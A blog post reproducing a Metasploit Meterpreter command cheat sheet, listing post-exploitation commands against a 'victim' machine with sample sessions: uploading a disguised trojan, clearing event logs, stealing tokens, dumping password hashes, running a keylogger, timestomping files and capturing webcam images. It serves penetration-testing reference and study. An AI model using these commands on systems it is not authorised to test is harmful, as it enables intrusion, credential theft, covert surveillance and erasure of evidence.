METASPLOIT METERPRETER COMMAND

METASPLOIT METERPRETER COMMAND CHEAT SHEET 1. CORE COMMANDS ? - help menu background - moves the current session to the background bgkil...

METASPLOIT METERPRETER COMMAND CHEAT SHEET

1. CORE COMMANDS

? - help menu
background - moves the current session to the background
bgkill - kills a background meterpreter script
bglist - provides a list of all running background scripts
bgrun - runs a script as a background thread
channel - displays active channels
close - closes a channel
exit - terminates a meterpreter session
help - help menu
interact - interacts with a channel
irb - go into Ruby scripting mode
migrate - moves the active process to a designated PID
quit - terminates the meterpreter session
read - reads the data from a channel
run - executes the meterpreter script designated after it
use - loads a meterpreter extension
write - writes data to a channel  

FILE SYTEM COMMANDS

cat - read and output to stdout the contents of a file
cd - change directory on the victim
del - delete a file on the victim  

download - download a file from the victim system to the attacker system  
When we need to retrieve a file from the target we use the download command, which tranfers the specified file into our local working directory. In this evetn that we need to recursively download an entire directory, we use the download -r command.
meterpreter > download c:\\boot.ini
[*] downloading: c:\boot.ini -> c:\boot.ini
[*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini
meterpreter >  
edit - edit a file with vim  
To edit a file using our default text editor we use edit command. Behind the sences, Meterpreter will download a copy of file to a temp directory, then upload the new file when the edit is complete.
getwd - print working directory
lcd - change local directory
lpwd - print local directory
ls - list files in current directory
mkdir - make a directory on the victim system
pwd - print working directory
rm - delete a file
rmdir - remove directory on the victim system
upload - upload a file from the attacker system to the victim  
To send a file to the target system we use the upload command, using the -r switch to recursively upload directories and their contents. In the following example we are uploading a falsely named Meterpreter payload.
meterpreter > upload evil_trojan.exe c:\\windows\\system32
[*] uploading  : evil_trojan.exe -> c:\windows\system32
[*] uploaded   : evil_trojan.exe -> c:\windows\system32\evil_trojan.exe
meterpreter >  

NETWORKING COMMANDS

ipconfig - displays network interfaces with key information including IP address, etc.
portfwd - forwards a port on the victim system to a remote service
route - view or modify the victim routing table  

SYSTEM COMMANDS

clearav - clears the event logs on the victim's computer
drop_token - drops a stolen token
execute - executes a command
getpid - gets the current process ID (PID)
getprivs - gets as many privileges as possible
getuid - get the user that the server is running as
kill - terminate the process designated by the PID
ps - list running processes
reboot - reboots the victim computer
reg - interact with the victim's registry
rev2self - calls RevertToSelf() on the victim machine
shell - opens a command shell on the victim machine
shutdown - shuts down the victim's computer
steal_token - attempts to steal the token of a specified (PID) process
sysinfo - gets the details about the victim computer such as OS and name  

USER INTERFACE COMMANDS

enumdesktops - lists all accessible desktops
getdesktop - get the current meterpreter desktop
idletime - checks to see how long since the victim system has been idle
keyscan_dump - dumps the contents of the software keylogger
keyscan_start - starts the software keylogger when associated with a process such as Word or browser
keyscan_stop - stops the software keylogger
screenshot - grabs a screenshot of the meterpreter desktop
set_desktop - changes the meterpreter desktop
uictl - enables control of some of the user interface components  

PRIVILEGE ESCALATION COMMANDS

getsystem – uses 15 built-in methods to gain sysadmin privileges

PASSWORD DUMP COMMANDS

hashdump – grabs the hashes in the password (SAM) file

TIMESTOMP COMMANDS

timestomp – manipulates the modify, access, and create attributes of a file

IDLETIME

Running idletime will display the number of seconds that the user at the remote machine has been idle.
meterpreter > idletime
User has been idle for: 5 hours 26 mins 35 secs
meterpreter >


WEBCAM_LIST

The webcam_list command when run from the Meterpreter shell, will display currently available web cams on the target host.
Example usage:
meterpreter > webcam_list
1: Creative WebCam NX Pro
2: Creative WebCam NX Pro (VFW)
meterpreter >

WEBCAM_SNAP

The webcam_snap’ command grabs a picture from a connected web cam on the target system, and saves it to disc as a JPEG image. By default, the save location is the local current working directory with a randomized filename.
meterpreter > webcam_snap -h
Usage: webcam_snap [options]
Grab a frame from the specified webcam.

OPTIONS:

    -h      Help Banner
    -i   The index of the webcam to use (Default: 1)
    -p   The JPEG image path (Default: 'gnFjTnzi.jpeg')
    -q   The JPEG image quality (Default: '50')
    -v   Automatically view the JPEG image (Default: 'true')

meterpreter >
OPTIONS:
-h: Displays the help information for the command
-i opt: If more then 1 web cam is connected, use this option to select the device to capture the
        image from
-p opt: Change path and filename of the image to be saved
-q opt: The imagine quality, 50 being the default/medium setting, 100 being best quality
-v opt: By default the value is true, which opens the image after capture.
Example usage:
meterpreter > webcam_snap -i 1 -v false
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/Offsec/YxdhwpeQ.jpeg
meterpreter >
Using webcam_snap Meterpreter plugin | Metasploit Unleashed


REFERENCES

https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/

COMMENTS

Name

2008,1,2012,1,2013,1,2018,1,2020,1,AC DC Power Jack / DC Port,12,Acer,1,Adaptor/Charger,10,Android,2,Asus,1,Blogspot,6,Chembook,1,ChipLevel,1,Chrome,2,CMD,2,Dell,4,Django,1,Free Fire,1,FRP Bypass,4,Game,1,Gmail,3,Google,3,Hackeraj,18,Hindi Dubbed,3,Hindi Movie,4,HP,2,HTML,2,Kali Linux,1,Keyboard,15,Linux,1,Medion,1,Metasploit,1,Mobile Repairing,3,Movie,7,NEC,1,Packard Bell EasyNote,1,PC,2,Product,38,Rishi Kapoor,1,Samsung,1,Speaker,1,Tiger Shroff,1,Toshiba,1,TV Channel,4,Website Hacking,1,Wifi,1,Windows,1,
ltr
item
Hackeraj: METASPLOIT METERPRETER COMMAND
METASPLOIT METERPRETER COMMAND
https://www.offensive-security.com/wp-content/uploads/2015/04/Webcam_snap-2.png
Hackeraj
http://hackeraj.raaz.info.np/2020/08/metasploit-meterpreter-command.html
http://hackeraj.raaz.info.np/
http://hackeraj.raaz.info.np/
http://hackeraj.raaz.info.np/2020/08/metasploit-meterpreter-command.html
true
4576236898731780867
UTF-8
Loaded All Posts Not found any posts VIEW ALL Readmore Reply Cancel reply Delete By Home PAGES POSTS View All RECOMMENDED FOR YOU LABEL ARCHIVE SEARCH ALL POSTS Not found any post match with your request Back Home Sunday Monday Tuesday Wednesday Thursday Friday Saturday Sun Mon Tue Wed Thu Fri Sat January February March April May June July August September October November December Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec just now 1 minute ago $$1$$ minutes ago 1 hour ago $$1$$ hours ago Yesterday $$1$$ days ago $$1$$ weeks ago more than 5 weeks ago Followers Follow THIS PREMIUM CONTENT IS LOCKED STEP 1: Share to a social network STEP 2: Click the link on your social network Copy All Code Select All Code All codes were copied to your clipboard Can not copy the codes / texts, please press [CTRL]+[C] (or CMD+C with Mac) to copy